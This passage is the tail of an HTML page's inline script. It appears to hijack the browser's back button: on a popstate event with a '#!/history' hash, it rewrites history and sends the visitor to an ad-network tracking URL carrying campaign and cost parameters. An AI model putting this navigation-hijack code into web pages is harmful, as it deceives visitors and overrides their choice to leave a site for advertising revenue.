        window.addEventListener("popstate", function() {
          if(location.hash === "#!/history") {
            history.replaceState(null, document.title, location.pathname);
            setTimeout(function(){
              location.replace("https://efquzn.mcgo2.com/visit/d39f786a-cd3b-49b5-a57d-d2e02157f888?cost={cost}&src_clid=${SUBID}&utm_campaign={campaignid}&utm_content={bannerid}&mc_pub={zoneid}");
            },0);
          }
        }, false);
        }(window, location));
        
    </script>
</body>

</html>